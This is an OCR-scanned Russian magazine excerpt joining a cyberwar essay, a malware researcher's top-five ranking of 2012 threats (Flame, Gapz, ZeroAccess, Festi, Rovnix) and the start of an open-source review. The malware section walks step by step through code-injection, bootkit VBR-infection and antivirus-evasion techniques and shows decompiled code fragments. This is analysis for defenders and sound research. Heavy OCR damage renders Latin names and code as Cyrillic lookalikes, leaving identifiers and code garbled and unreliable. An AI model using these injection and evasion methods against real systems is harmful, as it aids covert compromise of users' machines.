Чтобы не просто отказ, ошибка наведения или 
отключение связи. Чтобы роботизированный 
боевой аппарат открыл огонь по своим. И не из- 
за случайности или неисправности (такое уже 
бывало), а по приказу противника. Лишь тогда 
специалисты по ИБ займут достойные места 
в структуре вооруженных сил. 

Аргумент, что, дескать, все военные (критич- 
ные) инфосистемы изолированы от интернета, 
просто наивен. Эта «изоляция» элементарно пре- 
одолевается. Люди в погонах, в отличие от штат- 
ских злохакеров, люди деятельные и не боятся 
оторвать задницу от компьютерного кресла. 



ПРОИЗВОДСТВО, СФЕРА 
ОБСЛУЖИВАНИЯ И ВОЕННОЕ ДЕЛО 



В нашем городе недавно открылся роботизированный ресторан. Вместо меню на столах сен- 
сорные экраны, а блюда разносит и убирает натуральный железный робот, наряженный под 
самурая. Присмотревшись к нему, автор узнал морально устаревшего японского сборочного 
робота. Такие в 1980-х проворно собирали «тойоты», пока производства не перевели в Таи- 
ланд и Малайзию. Списанный однорукий раб ныне развлекает туристов, выполняя простей- 
шие операции с тарелками. Но этот примитив кажется посетителям передним краем науки, 
они смотрят с открытым ртом и платят полуторную цену. 

Военное дело настолько же опережает гражданскую промышленность, насколько про- 
мышленность — бытовую сферу. 
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Если завтра — кибервойна 



Тайное проникновение на охраняемый объект, 
перехват радиоканала, доступ к кабелю, силовой 
захват оконечного оборудования, внедрение 
агентов в технический персонал — эти средства 
в арсенале каждой разведки. Чем обширнее ин- 
формационная система, тем больше в ней точек 
несанкционированного подключения. 

Поэтому концепция киберобороны должна 
исходить из предположения, что противник 
имеет канал связи с любой нашей системой, 
а любая сеть не является доверенной. К со- 
жалению, эта парадигма пока не господствует. 
Где-то на раннем этапе проектирования раз- 
работчики употребляют слово «наша» в от- 
ношении сети, программы или канала связи — 
в значении «наша собственность» или «наша 
разработка». После этого магическое слово 
начинает жить собственной жизнью и обма- 
нывать собственных создателей. «Наша сеть» 
кажется более доверенной, чем «чужая»; «наш 
работник» почему-то воспринимается менее 
склонным к воровству и предательству, чем 
«чужой», и так далее. Сей ментальный таракан 
крайне живуч. Он обманывает не только воен- 
ных, но даже культурных образованных людей, 
то есть айтишников. 

Теперь прикинем возможные сценарии 
кибервойны. Автору приходит в голову два вари- 
анта: фантастичный и реалистичный. 



СЩНАРИЙ 1! 

Страна К живет во враждебном окружении и по- 
дозревает страну А в намерении напасть на нее 
и установить демократию. Однако в данный 
момент А не повышает боеготовности и держит 
вблизи границ только дежурные силы, поэтому 
военные К тоже не очень напрягаются и несут 
службу в обычном режиме. 

На пост управления ПВО страны поступает 
по спецсвязи доклад от начальника станции 
слежения № 3 о внезапно возникшей поломке, 
из-за которой придется что-то перезапустить 
и переподключить. Начальник станции умоляет 
штабного коллегу не докладывать команду- 
ющему, ссылаясь на совместно выпитый пуд 
соли. Нет! Дежурный не может пойти на такое 
нарушение. О допущенном на Третьей косяке 
он непременно напишет рапорт. Правда, боевую 
тревогу он не объявит, когда через несколько 
минут связь оборвется. Именно этого противник 
и добивался. 

В этот момент станция слежения № 3 была 
уничтожена ударом крылатой ракеты с дежурив- 
шей поблизости подводной лодки А. По стран- 
ному стечению обстоятельств, полк истреби- 
тельной авиации этого же округа на сегодня 
отменил все полеты. Накануне по спецсвязи они 
получили такой приказ — планируется пролет 
самолета Великого Руководителя. В возникший 




зазор между зонами покрытия станций № 2 
и № 4 прошли несколько истребителей-бом- 
бардировщиков «Стеле» с дежурного авианос- 
ца и просочилось полсотни крылатых ракет 
с дежурного бомбардировщика. Вечером того же 
дня военнослужащие А, сдавая смену, отметили 
в журналах, что за время несения дежурства на- 
чата и закончена война, инфраструктура страны 
К перестала существовать, можно начинать 
поставку гуманитарной помощи. 

СІ^НАРИЙ 2 

Одно африканское государство С постоянно 
угрожает международному военному блоку 
стран Н. Замышляет недоброе и явно готовит 
вторжение. 

В один прекрасный день подвергаются ки- 
бератаке серверы бирж, авиакомпаний и мор- 
ских портов нескольких государств блока Н. 
«Си-эн-эн» показывает душераздирающие 
кадры с зелеными символами, бегущими 
по черным экранам; мир шокирован. Отме- 
нены десятки рейсов, остановлена биржевая 
торговля. Следы кибератаки ведут в указанную 
африканскую страну С, о чем авторитетно заяв- 
ляет Киберкомандование Н. Невозможно остав- 
лять агрессию без ответа. Для принуждения 
к прекращению кибератак в С высаживаются 
несколько отрядов спецназа с оказавшейся по- 
близости авианосной группы флота. Они захва- 
тывают хакеров и их пособников — Правитель- 
ство, Госсовет и Генштаб С. Чтобы африканской 
стране не было скучно, пока Гаагский трибунал 
будет разбираться во всем этом безобразии, 
временно исполнять обязанности Правитель- 
ства С ставят недоеденных представителей 
оппозиции. По окончании операции кибератаки, 
естественно, прекращаются. 

Какой из сценариев фантастичный, а ка- 
кой — реалистичный, попробуй догадаться 
самостоятельно. Но с технической точки зрения 
оба они одинаково возможны, да и по затратам 
примерно равноценны. 

Кстати, о затратах. Как уже говорилось, ки- 
бероружие и защита от него обойдутся налого- 
плательщикам недешево. Нашему брату айтиш- 
нику наконец-то отрежут кусочек от военного 
пирога. И высокие технологии получат пинок 
для развития. 

Военные технологии, конечно, много дают 
для гражданских. Только прежде, чем дать, 
они берут. Для того чтобы в автомобилях за- 
велись удобные и дешевые 6Р5-навигаторы, 
предыдущие несколько лет крылатые ракеты 
с этим же самым 6Р5 влетали в форточки узлов 
связи и вентиляционные шахты убежищ. Лишь 
собрав свою кровавую жатву, технология 6Р5 
осчастливила выживших людей гражданскими 
навигаторами. 

Для того чтобы сегодня ты мог в несколько 
кликов зашифровать собственный диск так, 
что вся королевская рать хоть в лепешку рас- 
шибется — ни байта не получит, предыдущие 
несколько лет принимали яд и ставились к стен- 
ке сотни элитных агентов раэведок, погоревших 
на ненадежной связи. С кибероружием будет 
примерно то же самое. □□ 
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Александр Матросов, 5епіог таіѵѵаге гевеагсНег, Е5ЕТ 




самых ■ 
технологичных 
угроз ушедшего 
года 



РІАМЕ, 6АР2, 2ЕК0АССЕ55, РЕ5ТІ, КОѴМІХ. 
КТО КРУЧЕ? 



Еще один год позади, и я снова готовлю этот субъективный итоговый материал о самых интересных 
и технологичных вредоносных программах прошлого года. Ну что же, 2012 год был весьма 
интересным и насыщенным, поэтому скучно не будет! (А если кто думает, что эту статью надо было 
поставить в прошлый номер, тот пусть сам выкинет елку и не затягивает годовой отчет до апреля! — 
Прим, ред.) 
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Тор-5 самых технологичных угроз ушедшего года 




Рис. 1. Работа со строками в шедеврах вирусостроения 



Ѵ\/ІМ32/РІАМЕР 



Об этом звере говорили уже очень много, в том 
числе и на страницах журнала. Поэтому здесь 
мы не будем разводить тягомотину на тему 
кибервойны и строить конспирологические 
теории. А сосредоточимся лишь на фактах, 
отраженных в коде РІате и его предше- 
ственников или последователей. Подробно 
изучая развитие сложных целенаправленных 
угроз, начиная со Зіихпеі, я пришел к выводу, 
что существует связь в коде вредоносных про- 
грамм Зіихпеі, Оири, РІате, Саизз и тіпіРІате. 
Точнее, прослеживается некоторая связь 
в архитектуре этих вредоносных программ, 
и далее удалось найти взаимосвязь между 
архитектурой базовой платформы, на которой 
они были разработаны. 

Несмотря на признаки схожести в алгорит- 
мах шифрования строк, обнаруженные некото- 
рыми известными компаниями, все же РІате 
базируется на собственной объектно-ориен- 
тированной платформе. А алгоритмы, на базе 
которых реализована работа со строками, 
имеют существенные отличия, и реализация 
РІате значительно сложнее (рис. 1). 

Архитектура РІате, в свою очередь, 
отличается от той платформы, на которой 
разработан Біихпеі или Оири. А если провести 
параллель по сложности анализа и восстанов- 
ления алгоритмов этих вредоносных программ, 
то получится, что самым простым будет баизв, 
за ним идет тіпіРІате, Біихпеі, Оири и самым 
сложным будет РІате, который и занимает по- 
четное первое место в нашем рейтинге. 

Ну а теперь давай углубимся в детали 
реализации этой вредоносной программы. 
Итак, внутри РІате живет ООП-фреймворк, 
базирующийся на событийно-ориентирован- 
ной логике и реализованный в виде списков 
объектов на базе контейнеров библиотеки 5Т1 
(Зіапсіагсі Тетріаіе ЫЬгагу), а точнее, на базе 
шаблона ѵесіог. Если изобразить абстрактную 
схему взаимосвязи объектов, то получается 
следующее (рис. 2). Вся эта красота реали- 
зована внутри основного модуля, известного 
как тззестдг.осх. Теперь давай немного обсу- 
дим основные компоненты этой диаграммы. 

Соттапсі Ехесиіегз — объекты этого типа 
реализованы для взаимодействия с команд- 
ными серверами и получения и последующей 
обработки полученных команд. 



ѴеЛог<Соп$итег> 



МоЬіІе 

Соп$итсг 
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ЮІЕК СтаЕхес Зпі^ег МипсН - РіІеРіпаег 



1 1 Г 



1 



ЗЬаге 

Биррііег 



Ѵесіог<ОеІауеаТа5к5> ■ ■ 



I Ѳее1Іе]иісе 



Рис. 2. Архитектура РІате 



ІпіТіа1І2е_СоппапйЕхесиІег_иесІог( ) ; 
ѵО ■ СеТ_МаіпиесТ2_Еиепиіаіиі1е( ) ; 

Напй1еР(;г_Соп5ТгисС(&ѵ2. ѵѲ, 1); 
ѵ5 » 0; 

НапйІеиесТ ІпіС(&иіі); 

ЮВѴТЕСѵбГ» 1; 

Нап(11еиесС_й()(1(еіѴ<і. &ѵ2); 

Нап(11еиесС_й(1(](еіѴіі, &Соппаі)ЕхесиСег_иесТог->ЕиНап1е2.Еиеп(Нап()1е) ; 
иЬіІе ( *СГіеск Та5кМдгСотр1е(іоп( ) ) // сЬеск Еог (егяіпаТіоп 

< 

' ЕхесиСеРеп(ІіпдСояріап(І5і(Сопяа(1Ехеси(ег_иесТог) ;// ехесийе репйіпд сойяап(і5 и^іпд соппапй ехеси(ег5 
\іІаі^ГогНап(І1е5_0(АиА, &ѵЗ. 60000, 0. 0); 

ЮВѴТЕ(ѵ5) - іТ 
Ое5С(АѵЭ) ; 

> 

ЮВѴТЕ(ѵ5) - 0; 

Напйіеіірс); Ое5(((<ик); 
у5 - 1; 

Ре$І;(&ѵ2); 
геТигп 0; 



Рис. 3. СоттапйЕхесиІег из РІате (описание в тексте), в восстановленном примере 



Тазкз — объекты этого типа описывают те- 
кущие задачи, выполняемые в отдельных по- 
токах. Есть два типа задач, которые встреча- 
ются во всех известных модификациях РІате: 
ЮІЕР — собственно этот тип задач реали- 
зует выполнение задач с некоторой задерж- 
кой, она происходит через взаимодействие 
с вектором <0е1ауес)Та5к5>; 

СоттапбЕхесиІег — отвечает за выполне- 
ние задач и выполнение команд из конфигура- 
ционной информации активного экземпляра 
РІате. В восстановленном примере кода это 
выглядит следующим образом (рис. 3). 

Сопзитегв — объекты, созданные 
при определенных событиях (создание новых 
модулей, активация внещнего носителя). 
Именно этоттип объектов реализует собы- 
тийно-ориентированную логику. Такой подход 
эффективен, поскольку РІате реализован 
для сбора информации и последующей 
передачи ее на командный центр. Известно 
несколько типов реализующих объекты по- 
требителей (сопзитегз): 

• ргосезз сопзитегз — реагирует при запу- 
ске определенных программ; 

• ѵоіите сопзитегз — реагирует при актива- 
ции нового тома в файловой системе; 



• гетоѵаЫе тесііа сопзитегз — реагирует 
на появление новых внешних носителей 
в системе; 

• тоЬіІе беѵісез сопзитегз — реагирует 
при подключении мобильных устройств. 

В процессе работы при изменении окруже- 
ния происходит срабатывание определенного 
триггера вредоносной программы и соот- 
ветствующим образом может поменяться ее 
последующая логика функционирования. 

Оеіауесі Тазкз — этот тип задач представ- 
лен объектами, которые выполняются с зара- 
нее определенной задержкой по времени. 

Описанные выше объекты реализуют 
основную архитектуру РІате, а сам подход к их 
реализации очень напоминает паттерн объ- 
ектно-ориентированного программирования 
«Команда». Біихпеі и Оири построены на базе 
другого контейнера библиотеки 5Т1, а точнее, 
на базе типа Іізі. Во РІате используется только 
тип ѵесіог, что вносит отличия в реализацию 
этих вредоносных программ. 

Тип Соттапб Ехесиіег реализует свой 
собственный интерфейс для обработки потока 
команд. Этот интерфейс можно описать в виде 
следующей структуры (рис. 4). 
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МАітКЕ 



5^гисІ ІСоятап(ІЕхесиІег 

{ 

// бег ІО о-Р гНе оЬ^есг 
іпг бегіО(); 

// етргу 5гиЬ 
ѵоісі Кв5егѵе<і(); 

// Иапдіе сошлапд Ьи'Р'Рег 

іпг 0і&рагсИ(ип5І§пе(і ьНогг Туре, ѵоігі * СояпапсІби'Р'Рег, іпг 5ирр); 
// <1е5ггисг гНе оЬз'есг 
ѵоій 0е5ггисгог(); 

>; 




Рис. 4. Соттап(ІЕхеси»ег реализует свой собственный интерфейс для обработки потока Рис. 5. Код обработчика команд с С&С ботнета (описание см. в тексте) 

команд 



А ВОТ так выглядит код обработчика команд 
с С&С этого ботнета (рис. 5). 

Как видно из приведенного кода, вся ин- 
формация хранится в собственной базе данных 
50Ы1е и информация, касающаяся обработчи- 
ков команд, хранится по ключу СМ0_0С1ЕиЕ. 
Команды хранятся в формате сжатых бинарных 
данных. При декодировании команды Ріате 
распаковывает данные и разделяет команды 
на блоки. Каждый блок обрабатывается кон- 
кретным обработчиком, который имеет свой 
идентификатор. Интерфейс обработчика может 
выглядеть следующим образом (рис. 6). 

Здесь СтсІЕхесиІег_0І5раІсЬ — функция 
обработчика, которая вызывается для обра- 
ботки поступившей команды или находящейся 
первой в очереди обработки. Различные дис- 
петчеры определены для обработки разных 
событий. Например, диспетчер ОЬОиегу об- 
рабатывает команды, связанные с запросами 
базе данных 50Ы(е. 

Помимо этого, команды могут быть со- 
хранены в файлах и в определенных катало- 
гах, в рамках которых будет осуществляться 
поиск. Существует специальный объект 
СоттапсІРіІеРіпсіег для обработки подоб- 
ного рода задач. Этот объект осуществляет 
сканирование заданного каталога и выгруз- 
ку команд в хранилище конфигурационной 
информации. Такой подход реализован во 
Ріате для работы в автономном режиме, когда 
бот не имеет прямого доступа к командному 
центру и работает в отложенном режиме. 



Получение команд в таком случае может 
осуществляться через других активных ботов, 
которые имеют возможность взаимодействия 
с командным центром. 

Как уже отмечалось, Ріате имеет 
собственную базу данных, реализованную 
на базе БОІіІе, в рамках которой хранятся 
собранные данные о зараженной системе и ее 
окружении. Схему этой базы данных ты мо- 
жешь увидеть в дополнительных материалах 
на нашем диске. 

Еще одной интересной особенностью этой 
вредоносной программы является использо- 
вание обработчиков, реализованных на языке 
программирования Іиа и выполняющихся 
с использованием встроенного интерпрета- 
тора. Из перечисленного становится ясно, 
что Ріате существенно отличается от обыч- 
ных вредоносных программ и имеет очень 
продуманную реализацию. Над этой вредо- 
носной программой совершенно однозначно 
работала команда высококвалифициро- 
ванных программистов, которые написали 
расширяемый и поддерживаемый в даль- 
нейшем код. Все это хорошо прослеживается 
в процессе обратного анализа. Настолько 
продуманной вредоносной программы мне 
еще не встречалось раньше. 



ѴѴІМ32/6АР2 



Об этой вредоносной программе еще не рас- 
сказывали подробно, да и обнаружена 
она была не так давно — осенью текущего 



года. Интересного в барг содержится доста- 
точно много, поэтому я начну с дроппера. Итак, 
на момент написания этой статьи было извест- 
но три различных модификации дроппера. Все 
их отличия приведены в таблице. 

Как видно из таблицы, используется до- 
статочно большое количество различных 
способов повышения привилегий; 

1) СѴЕ-2011-3402 (ТгиеТуре Еопі Рагзіпд 
ѴиІпегаЬіІіІу); 

2) СѴЕ-201 0-4398 Югіѵег Ітргорег Іп(егас(іоп 
ѵѵііЬѴѴіпсІоѵѵз КегпеІѴиІпегаЬіІі(у); 

3) СОМ Еіеѵаііоп (ІІАСѵѵЫіеІізі). 

На данный момент они уже не представляют 
для нас большого интереса, так как давно опи- 
саны в общедоступных источниках информа- 
ции и не раз упоминались на страницах журна- 
ла. Сейчас мы сфокусируемся на исследовании 
дроппера, а точнее, его структуры и нового 
метода внедрения кода. Итак, дроппер, по- 
мимо точки входа (епігуроіпі), имеет еще ряд 
экспортируемых функций, которые имеют 
свое предназначение в процессе заражения 
системы (рис. 7). 

Здесь: 

• з(агІ — точка входа дроппера, с которой на- 
чинается выполнение кода и после проверки 
на наличие активных антивирусных продук- 
тов происходитвнедрение кода вадресное 
пространство процесса ехріогег.ехе; 

• істп^ — эта экспортируемая функция отвеча- 
етза поднятие привилегий и вызывается уже 



НАШ ТОР-5 ДЛЯ ТЕХ, КТО НЕ ОСИЛИВАЕТ МНОГО БУКВ 



П \Л/іп32/РІатег (он же 
Ріате) — за слож- 
ность в анализе и рекон- 
струкции алгоритмов. 
Очень много кода, пред- 
усматривающего огром- 
ное количество внеш- 
татных ситуаций и очень 
изящно обходящего 
некоторые антивирусные 
продукты. 



Н )^іп32/6ар2 — вы- 
стрелил под конец 
года с новой технологи- 
ей реализации ѴВР- 
буткита и интересным 
методом внедрения кода 
в системный процесс 
ехріогег.ехе, работающе- 
го в обход большинства 
Н1Р5-систем. 



ѴѴіп32/5ІгеІеІ 
(ІегоАссезз) — так- 
же один из интересней- 
ших экземпляров (его 
последние модифика- 
ции) уходящего года. 
Использует интересный 
метод внедрения кода 
и недокументированные 
возможности файловой 
системы МТР5 для про- 
тиводействия удалению 
собственных файлов. 



□ \Ѵіп32/РезІі — по- 
лучает четвертое 
место за изощренную 
реализацию объек- 
тно-ориентированной 
платформы внутри тела 
основного драйвера и ис- 
пользования системы 
бестелесных расширений 
для ООоЗ-атаки рассыл- 
ки спама. Расширения 
не хранятся на жестком 
диске и доступны в памя- 
ти зараженной системы. 



О ^іп32/Роѵпіх — 
получает почетное 
последнее место в нашем 
рейтинге за дальней- 
шее развитие наиболее 
сложной файловой 
системы, используемой 
в современных бутки- 
тах. Файловая система 
этого буткита базирует- 
ся на стандарте РАТ16 
и ни в чем не уступает не- 
которым операционным 
системам. 
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Тор-5 самых технологичных угроз ушедшего года 



внедренным кодом из контекста процесса 




ехріогег.ехе; 


СМО_ЕХЕСиТЕК_иіРЕК_иТйВІЕ Ий оЕЕзеІ: Стс1Ехеси<:ег_Се1:І0 


• ізузр^ — эта экспортируемая функция отвеча- 


(1(1 оЕЕБеІ; Сги1Ехеси1:ег_Ке5егие(1 


етуже непосредственно за заражение систе- 


(1(1 оЕЕзеІ: Сги1ЕхесиІ:ег_0І5раІ:сІі 


мы, если все предыдущие стадии выполнения 


(1(1 оЕЕзеІ: СпкІЕхеси^ег Ве5І:гис1:ог 


отработали корректно. 





Рис. 6. Интерфейс обработчика 



Название 


Дата компиляции 


Эксплуатируемые 

уязвимости 


Техника 

буткит-заражения 


ѴѴІп32/6арг.А 


11/09/2012 

30/10/2012 


I СѴЕ-201 1-3402 

I СѴЕ-2010-4398 

СОМЕІеѵаІіоп 


ѴВР 


ѴѴІп32/Оарг.В 


06/11/2012 

1 


1 СѴЕ-2011-3402 

1 СОМЕІеѵаІіоп 


поЬооІкіІ 




1 


СѴЕ-2010-4398 




ѴѴіп32/Сарг.С 


19/04/2012 

і 


СѴЕ-2011-2005 

СОМЕІеѵаІіоп 


МВР 



Эту последовательность действий можно 
описать так: инжектируемся в ехріогег.ехе 
(точку входа) -♦ Повышаем локальные приви- 
легии (істпП Заражаем систему (ізузрП. 

Ну а теперь давай перейдем к описанию 
метода внедрения кода, который обходит 
большинство известных на данный момент 
Н1Р5-систем (да, вот такой вот хардкорчик). 
Стоит отметить, что эта техника внедрения 
используется во всех известных на данный мо- 
мент версиях дроппера семейства ѴѴіп32/Сар2. 
Итак, теперь пройдемся по шагам алгоритма 
внедрения кода: 

1. Сначала открывается одна из разделяемых 
секций\Ва5еМатесЮЬ)ес15, которые за- 
гружены в адресное пространство ехріогег. 
ехе, после чего происходит запись шелл-кода 
в конецэтой секции. 

2. После успешно выполненного первого шага 
дроппер ищет окно 5Ье11_Тгау\Л/пс1. 

3. После этого происходит вызов ѴѴіпАРІ- 
функции беіѴѴіпсІоѵл/СопдО для получения 
адреса оконного обработчика для окна 5Не11_ 
ТгауѴѴпсІ. 

4. Далее происходит вызов функции 
ЗеіѴѴіпсіоѵѵІопдО, которая модифицирует 
5Ье11_Тгау^п(1 данные, ассоциированные 
с этим окном. 

5. Затем следует вызов функции 
ЗепсІМоІі^уМеззадеО, которая передает 



Таблица 1. Отличия дропперов 

управление на шелл-код, размещенный 
ранее в адресном пространстве процесса 
ехріогег.ехе. 

После того как функция 
ЗепсіМоІі^уМеззадеО будет выполнена, 
обработчик окна 5ЬеІІ_ТгауѴ\/псі и кон- 
троль передается по адресу, на который 
был получен при помощи вызова функции 
5еіѴѴіпсіо\л/Іопд{) на одном из предыдущих 
шагов. Этот адрес указывает на обработчик 
пІсІІІ.КіизегАрсОізраІсНегО, который продемон- 
стрирован на рис. 8. 

После обработки пІгіІІ.КіІІзегАрсОізраІсЬегО 
управление передается непосредственно 



на шелл-код, который выглядит следующим 
образом (рис. 9). 

Как видно из рис. 9, шелл-код созда- 
ет поток в контексте процесса ехріогег.ехе 
и восстанавливает оригинальное значение, 
измененное на предыдущей стадии при помо- 
щи вызова 5еІ\^іп(1оѵѵІопд(). После успеш- 
но созданного потока дроппер переходит 
к следующей стадии выполнения, связанной 
с повышением привилегий, так как процесс 
ехріогег.ехе выполняется с привилегиями 
текущего пользователя. Подобный трюк ис- 
пользует довольно нестандартные функции 
для внедрения кода, что не дает возможности 
различным поведенческим анализаторам за- 



і^СЬоо$е ап еп(гу роіп^ 


Мате 


Ас1сіге$$ 


[0 9Р' 


00445Р70 


[3 істп( 


004075В7 


[0 І5у5р( 


00406ЕРО 


® Лаіі 


004079Е9 



ОгсііпаІ 

1 $Иагес1тетогу 

2 $НеІІсосІе_$1аве1 

3 $Не11сос1е_$гаее2 
етгуроіпг 



Рис. 7. Экспортируемые функции дроппера 
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Рис. 9. Шелл-код 
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МАШАКЕ 



подозрить неладное и вовремя среагировать. 

У читателя может возникнуть закономерный 
вопрос: а как же обход А51Р на х64-системах? 
Все верно, разработчики не стали заморачи- 
ваться, и для поиска шелл-кода используется 
несложный РОР-код. Подробно останавли- 
ваться на этом моменте я не буду, так как по- 
добная методика уже не раз была описана 
в статьях Алексея Синцова об эксплуатации 
уязвимостей. А сейчас перейдем еще к одной 
интересной особенности барі — внутреннему 
устройству буткит-части. 

Итак, прежде чем углубляться в детали, 
давай рассмотрим схему, иллюстрирующую 
известные методологии заражения системы 
при помощи буткитов (рис. 10 ). 

До момента обнаружения семейства бар 2 
самым передовым буткитом был Роѵпіх, кото- 
рый первым стал инфицировать ѴВР (Ѵоіите 
Вооі РесогсІ). Но методология, использованная 
в 6 ар 2 , еще более изощренная, поэтому в моем 
личном хит-параде буткитов лидером теперь 
является именно 6 ар 2 . 

Итак, в последних модификациях ѴѴіп32/ 
6 ар 2 происходит модификация ѴВР активного 
раздела. Происходит модификация только 
четырех байт оригинального ѴВР-кода, при по- 
мощи которых передается управление на вре- 
доносный код. Подобный подход к заражению 
делает 6 ар 2 довольно незаметным в системе, 
и изменение всего лишь четырех байт затруд- 
няет обнаружение этой угрозы стандартными 
способами. Сутью подхода, использованного 
в 6 ар 2 , является модификация только поля 
Ніс 1 с 1 еп 5 ес(ог 5 , а все остальные данные ѴВР 
и ІРІ (Іпіііаі Ргодгат Іоасіег) остаются не- 
тронутыми. Давай посмотрим на устройство 
активного раздела ѴВР: 

• ѴВР-код, ответственный за загрузку и ІРІ; 

• ВІОБРагатеІегВІоск — структура данных, 
хранящая параметры раздела МТР5; 

• ТехіВігіпдв — строковые константы для ото- 
бражения в случае ошибки; 

• 0хАА55 — два байта сигнатуры начала ѴВР- 
кода. 

Наиболее интересным местом для ана- 
лиза ѴВР в нашем случае будет блок ВРВ 
(ВІ05 Рагаппеіег ВІоск), в структуре которого 
находится поле Нісісіеп Бесіогв. Значение этого 
поля содержит количество секторов предше- 
ствующих ІРІ, хранящихся в томе МТР5. 

Таким образом, ѴВР-код считывает 15 сек- 
торов, начиная с этого значения, и передает 
управление на код буткита. Происходит за- 
мена значения количества секторов, и теперь 




Рис. 10. Известные методологии заражения буткитами 
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Рис. 11. Загрузочный код после заражения 



управление передается в другое место. Атак 
выглядит загрузочный код после заражения 
ѴѴіп32/бар2(рис. 11). 

Еще одной интересной особенностью 
вредоносной программы 0 ар 2 является то, 
что у нее отсутствует как таковое тело драй- 
вера. А весь код, загруженный в адресное 
пространство ядра, представляет собой по- 
следовательности шелл-кода. Нечто подобное 
уже было реализовано в ТОІЗ несколько лет 
назад. Отдельно стоит отметить, что подобный 
подход к загрузке вредоносного кода в ядро 
операционной системы автоматически обходит 
защитный механизм ЕІАМ (Еагіу ІаипсЬ 
Ап^і-Маіѵѵаге Мосіиіе), появившийся начиная с 
ѴѴіпсІоѵѵз 8 . Так как вредоносный код оказыва- 
ется загруженным в адресное пространство 
ядра значительно раньше, нежели происходит 
проверка ЕІАМ. 



Очевидно, что ЕІАМ оказывается беспо- 
лезным в случае активного буткит-заражения, 
если драйвер или шелл-код оказался в ядре 
раньше защитных проверок. 

В качестве итога по 6 ар 2 хочу отметить, 
что по-прежнему находятся новые способы 
разработки эффективных буткитов, а также 
способов внедрения кода вопреки активному 
защитному ПО. По моему мнению, ѴѴіп32/6ар2 
занял почетное второе место нашего рейтинга 
более чем заслуженно. 



ѴѴІЫ32/5ІКЕРЕР 



Эта угроза меня заинтересовала тоже до- 
вольно интересным и нестандартным методом 
внедрения кода в системный процесс зегѵісез. 
ехе. 

Итак, давай пройдемся по шагам алгоритма 
внедрения кода. 



ПОДОБНЫЙ ПОДХОД к ЗАГРУЗКЕ ВРЕДОНОСНОГО КОДА В ЯДРО 
ОПЕРАЦИОННОЙ СИСТЕМЫ АВТОМАТИЧЕСКИ ОБХОДИТ ЗАЩИТНЫЙ 
МЕХАНИЗМ ЕІАМ (ЕАРСУ ІАОНСН АНТ1*МАШАРЕ МОООІЕЬ 
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Рис. 12. Функция внедрения кода в декомпилированном виде 



Рис. 13. Полиморфизм тела буткита 



На первом этапе происходит извлечение 
шелл-кода, хранящегося внутри дроппера. 

На втором происходит непосредственное 
внедрение кода в зегѵісез.ехе (Зегѵісе Сопігоі 
Мападег). Функция внедрения кода вдеком- 
пилированном виде выглядит следующим 
образом (рис. 12). 

В последних версиях 2егоАссез5 использовал 
дветехники внедрения кода. Первый способ 
задействовал трюк с вызовом 2ѵѵ0репТНгеасШ/ 
ІѵѵОрепРгосеззІ), модификацией памяти и вызо- 
вом 2ѵѵ0иеиеАрсТЬгеа(1(). Этот метод применялся 
для заражения х86-систем. Второй же способ 
использовался для заражения 64-битныхсистем 
и осуществляет модификации в файле Зегѵісе 
Сопігоі Мападег. 

На следующем шаге второго способа 
внедрения кода происходит создание объекта 
секции посредством вызова 2ѵѵСгеаІе5есііоп() 
и копирование зегѵісез.ехе содержимого 
файла, созданного на предыдущем этапе. 
После этого модифицируется код функции 
БсРедізІегТСРЕпсІроіпи) и удаляется поддерж- 
ка А51Р в этом модуле путем модификации 
соответствующего флага в РЕ-заголовке (зто 
необходимо для стабильной работы шелл- 
кода, так как он работает с заранее заданными 
адресами). 

Заключительным, четвертым шагом являет- 
ся создание нового файла зегѵісез.ехе с ори- 
гинальным названием, но измененным внутри. 
Создание файла осуществляется при помощи 
вызова 2ѵѵСгеа1еРіІе(), что позволяетзаполнить 
расширенные атрибуты МТР5. Это позволяет 



указать в них путь к вредоносному сіІІ-модулю. 
Этот модуль не хранится непосредственно 
в зегѵісез.ехе и загружается, используя недоку- 
ментированные особенности файловой системы 
МТР5. 

Таким образом, ^іп32/5ігеЫ — интересный 
и сложный образец современных руткит-тех- 
нологий, авторы которых постоянно совершен- 
ствуют свое творение и добавляют нам хлопот 
с его обнаружением. Поэтому мы отдаем этой 
угрозе почетное третье место за нестандарт- 
ные приемы, использованные в процессе 
внедрения кода. 



ѴѴІМ32/РЕ5ТІ 



Так как место в журнале не резиновое, 
а я и так разошелся в описании предыдущих 
угроз, я не буду уделять много внимания Резіі. 
Ведь совсем недавно (несколько номеров 
назад) была опубликована подробная статья, 
описывающая эту вредоносную программу. 
Скажу только, что Резіі получает четвертое 
место нашего рейтинга за интересный подход 
в реализации ООП-фреймворка внутри драй- 
вера и бестелесную систему плагинов, которые 
не хранятся на диске. Подробности об этой 
вредоносной угрозе также можно найти в моем 
личном блоге ( атаІгозоѵ.Ыодзро^сот І. 



\Л/IN32/Р0VNIX 



До появления семейства барг именно этот 
буткит был наиболее технологичным. В этом 
же году эта буткит-платформа не претерпела 
больших изменений, а все обновления были 



направлены на затруднение обнаружения 
со стороны антивирусного ПО и доработки 
скрытой файловой системы. Таким образом, 
распаковщик основного тела буткита стал по- 
лиморфным. 

Если углубиться непосредственно в код, 
то на самом деле полиморфизм, используемый 
в нем, достаточно прост (рис. 13). Коснулись 
изменения и скрытой файловой системы, в ко- 
торой появилась возможность множественных 
внедрений кода, что позволяет устанавливать 
несколько вредоносных программ одновре- 
менно и контролировать работу их драйвера 
в ядре операционной системы. 

За все это Роѵпіх опять попал в наш рей- 
тинг, но уже на последнее место, так как не со- 
держит принципиальных нововведений. 



В КАЧЕСТВЕ ЗАКЛЮЧЕНИЯ 



Среди огромного потока угроз, который про- 
ходит через наши исследовательские центры 
по всему миру, встречается не так много 
действительно интересных и нестандартных 
вредоносных программ, исследуя которые 
можно почерпнуть что-то новое. 

В этой статье я постарался собрать те 
угрозы, что увлекли лично меня. К примеру, 
на исследование РІате понадобилось не- 
сколько месяцев, чтобы получить более-менее 
понятную картину и установить все взаимо- 
связи с его предшественниками на уровне 
кода. Будем надеяться, в следующем году нам 
будет чем наполнить очередной технологиче- 
ский рейтингугроз ;). □□ 
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НОВЫЙ ПРОЙДЕННЫЙ РУБЕЖ 

Традиционный обзор главных до- 
стижений движения Ореп Зоигсе 
в прошедшем году. Спойлер: Ііпих 
не завоевал десктоп, но в очередной 
раз сделал два шага навстречу этой 
цели. Цель, впрочем, отошла на пять 
шагов дальше. Всё как всегда, а чего 
ты, спрашивается, хотел? 

В обзор вошли изменения в ядре 
Ыпих, анализ новшеств в ІІЬипІи, 
новые разработки в ВЗО-стане 
и такие знаковые явления, как вы- 
ход Зіеат под Ыпих. Не забыли и про 
непрекращающуюся эпопею с ІІЕРІ- 
